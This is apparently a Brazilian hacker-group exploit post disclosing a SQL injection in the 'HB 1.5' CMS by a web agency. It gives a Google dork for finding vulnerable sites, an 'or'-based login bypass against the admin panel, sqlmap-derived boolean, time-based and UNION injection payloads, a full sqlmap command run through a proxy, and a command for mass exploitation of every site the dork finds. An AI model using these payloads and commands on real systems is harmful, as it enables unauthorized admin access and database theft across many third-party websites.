Google INURL - Brasil: HB Web

0day - Exploit php explora SQL INJECTION via( GET/POST) em CMS brasileiro HB feito pela empresa "Agência HB Web e Cia".

[+] Discoverer Author: M3t4tr0n
[+] FACEBOOK: https://www.facebook.com/M3T4TR0N
[+] EMAIL: [email protected]
[*] Thanks M3t4tr0n

# SCRIPT by: [ I N U R L-B R A S I L ] - [ By GoogleINURL ]
# EXPLOIT NAME: XPL 0day CMS HB 1.5 / INURL BRASIL
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EA:http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil

Neither war between hackers, nor peace for the system.

------------------------------------------------------------------------------

[ + ] FAILURE REPORTED:
15/maio/2015

[ + ] Type:

ADMINISTRATIVE ACCESS PANEL

[ + ] Vendor:
http://www.hbwebecia.com.br/

[ + ] Version:
HB 1.5

[ + ] Google Dork:
inurl:"base.php?pagina"

[ + ] FILE VULN:
/admin/logar.php

[ + ] POC:
(POST) http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar

[ + ] FILE VULN:
/base.php

[ + ] POC:
(GET) http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)

[ + ] Exploração SQLMAP output:
# Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe

# Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC

# Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--

[ + ] USE SQLMAP:
./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'
--dbs --random-agent --level 3 --risk 2--proxy 'http://localhost:8118'
--dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only
--flush-session --batch

[ + ] EXECUTE:
php xpl.php -t http://target.us

[ + ] FILE_OUTPUT :
HB.txt

PRINT OUTPUT:

[ + ] EXECUTE: php xpl.php -t http://target.us

[ + ] Exploit:
http://www.exploit4arab.net/exploits/1505 / http://pastebin.com/AY6sMthP

[ + ] EXPLOIT MASS USE SCANNER INURLBR:
php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'

PRINT OUTPUT: